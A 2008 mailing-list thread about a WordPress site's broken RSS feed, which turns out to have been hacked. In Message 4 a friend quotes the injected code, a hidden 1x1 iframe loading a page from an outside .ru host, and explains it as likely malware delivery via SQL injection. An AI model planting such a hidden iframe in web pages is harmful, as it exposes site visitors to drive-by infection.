I've tried everything but cant fix my feed.

  • neilm_365
    Message 1 of 5 , Nov 4, 2008
      My feed was working fine until the end of the month when this error
      appeared which means my rss and podcast feeds just dont work:

      line 800, column 0: XML parsing error: <unknown>:800:0: junk after
      document element [help]

      <script type="text/javascript">

      This is the feedvalidator address:
      http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fwww.musiclikedirt.com%2Ffeed

      I dont understand why it suddenly changed as Im wracking my mind to
      remember changing anything on the site?

      Can anyone help or point me in right direction?
    • Bill Kearney
      Message 2 of 5 , Nov 4, 2008
        Short answer:
        You've got a ton of formatting junk in the feed. Take it out.

        Long(er) answer is feeds are designed to carry textual info and small
        amounts of extra data (like enclosures, etc). Not a ton of formatting and
        scripting. You need to make a feed that's composed of text, not just web
        posts full of bells-and-whistles. Feeds are (largely) designed to allow
        readers to READ them, not be inundated with a barrage of web gizmos. That's
        what web pages are for, not feeds.

        So, simplify the feed and it'll work.

        Message 3 of 5 , Nov 4, 2008
          Bill,
          I think that's your opinion and likely the intent of RDF RSS, but RSS
          2.0 specifically allows for markup and style (formatting junk). Many
          RSS clients will display markup and style so that the subscriber can
          read entire posts without having to open every blog in your Web
          browser that he's subscribed to.

          When I clicked on the validator URL included, I didn't see any errors
          and the feed appeared to be valid. I can only assume the publisher
          was able to fix the feed before I approved his message.
          Thanks,

          Randy Charles Morin
          http://www.therssweblog.com

          --- In rss-public@yahoogroups.com, "Bill Kearney" <wkearney@...>

          Message 4 of 5 , Nov 4, 2008
            I think what happened is I got hacked. Just got this email from a programmer friend of
            mine:

            I'm afraid it looks like your site has been hacked - if it's Wordpress and it's out of date,
            and if you allow comments or some other way for the user to get input onto the site, then
            it was could have been through an SQL injection attack. If none of those are true then
            perhaps someone gained access to the server itself.

            The Javascript plants this HTML at the end of your page:

            <iframe src='http://trafficinc.ru/index.php' width='1' height='1' style='visibil
            ity: hidden;'></iframe>

            The iframe will contain whatever trafficinc.ru/index.php is dishing up - I would suspect
            it'd be malware that is attempting to exploit some vulnerability or other. Its size means
            that it wouldn't be visible on screen so it's not simply trying to plant advertising on your
            page.

            I would take the site down to stop your users from getting infected, then update to the
            latest WordPress, PHP and MySQL and find out where that HTML is in the database and get
            rid of it (it could be anywhere, SQL injection attacks allow the attacker to write content
            into any record in the database, but it'll have the text you're seeing in your page so it
            shouldn't be too hard to find).

            Good luck!
            --------------

            I updated to Wordpress 2.6.3 and the feed error disappeared so it must have been placed
            on my site by a hacker! Very alarming and I need to look into where the code is. I
            remember a few weeks ago finding a comment on the site that said it was made by me (ie
            Admin) but I knew nothing about it.

            Regarding all the formatting I really need to learn more about RSS. Ive not got a clue about
            how to strip out formatting from my feed. The whole podcast rss and normal rss process
            is quite confusing to a beginner.

            Thanks all for the help
          • neilm_365
            Message 5 of 5 , Nov 4, 2008
              Thanks Randy

              I just wasted three days switching off plug ins, deleting &'s, checking code and unpublishing
              posts trying to fix it but it turns out I'd been hacked.

              Someone has put some code which corrupted the feed on my site or database (ive not
              worked out which yet). Upgrading to latest Wordpress fixed the feed.